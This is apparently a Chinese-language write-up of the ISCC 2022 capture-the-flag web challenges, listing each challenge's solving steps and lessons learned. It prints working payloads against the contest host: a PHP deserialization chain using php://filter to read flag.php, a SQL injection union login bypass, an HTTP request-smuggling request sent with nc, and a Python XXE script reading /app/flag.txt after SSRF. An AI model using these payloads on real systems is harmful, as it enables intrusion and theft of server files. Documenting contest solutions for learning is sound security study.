ISCC2022WP--WEB

Web1-冬奥会

解题步骤

打开靶机后,通过阅读界面PHP代码进行审计,得出payload后得解

具体描述

打开靶机

 

通过分析PHP代码进行代码审计,得到payload:http://59.110.159.206:7060/?Information={%22year%22:%222022a%22,%22items%22:[%22skiin%22,%20[%22test%22],%200]}

【当满足代码中的两个条件之时,界面会打印出flag】

 

解题收获

通过分析php代码,了解了基本的php代码含义

Web3-pop2022

解题步骤

打开靶机后,依然是php代码审计,发现与反序列化有关,进行求解,得出字符串后用base64进行解码

具体描述

打开后通过反序列化得出payload:

http://59.110.159.206:7050/?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A3%3A%22aaa%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

 

最后通过base64解码得出flag

解题收获

学习到了php反序列化的相关知识

Web4- Easy-SQL

解题步骤

通过SQL注入得出flag

具体描述

打开靶机

 

先想到是否需要SQL注入,通过?id=1得到一些数据,通过POST传入【username=admin' union select 'admin','admin','admin'#&passwd=admin】得到flag

解题收获

学习到了布尔盲注和利用burp suite进行POST传参

Web5-让我康康

解题步骤

请求走私漏洞

参考文章:http://www.hackdig.com/10/hack-519692.html

多次复现得到payload

具体描述

Payload :

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

通过kali终端运行拿到flag

 

解题收获

学习了WAF防火墙绕过,请求走私漏洞

Web6-findme

解题步骤

打开靶机,文件包含获得flag

具体描述

Payload: http://59.110.159.206:8030/flllHL91244ggg-SecR1et.txt

获取flag

解题收获

学习了文件包含

Web7-这是一道代码审计题

解题步骤

通过脚本获取payload来得到flag

具体描述

Payload  python脚本

url = 'http://59.110.159.206:8040/mti3ljaumc4x/codelogin'
cookie = 'login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ=='
payload = &apos;&apos;&apos;<?xml version = "1.0"?><!DOCTYPE ANY [<!ENTITY foo SYSTEM "file:///app/flag.txt">]><user><name>&foo;</name><password>pysnow</password></user>&apos;&apos;&apos;
data = {&apos;data&apos;: payload}
r = requests.post(url, data=payload, headers={&apos;Content-Type&apos;: &apos;text/xml&apos;})
print(r.text)

打开题目进入index路由,将cookie:login=0改为1,然后get传参url=xxx,随便传一个获取到一个提示/static/xx,然后可以发现一大堆emoji表情,直接http://www.atoolbox.net/Tool.php?Id=937上面解码拿到源码,审计源码发现是一个ssrf的题,注意这一串代码

然后可以猜测一下这个addr就是127.0.0.1,编码一下就是MTI3LjAuMC4x,传参url=http://@MTI3LjAuMC4x,可以获得提示

给了一个cookie,然后我们直接带着这个cookie去访问这个路由就行

查看源代码发现很明显是一个xxe,而且这个title提示了flag的位置在./flag.txt里面,可以猜测这个flag的位置就在/app/flag.txt,然后直接x就行,脚本就是最开始写的那一个

解题收获

代码审计

Web8-爱国敬业好青年

解题步骤

利用burp suite进行POST 传参得到flag

具体描述

 

解题收获

POST 传参

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值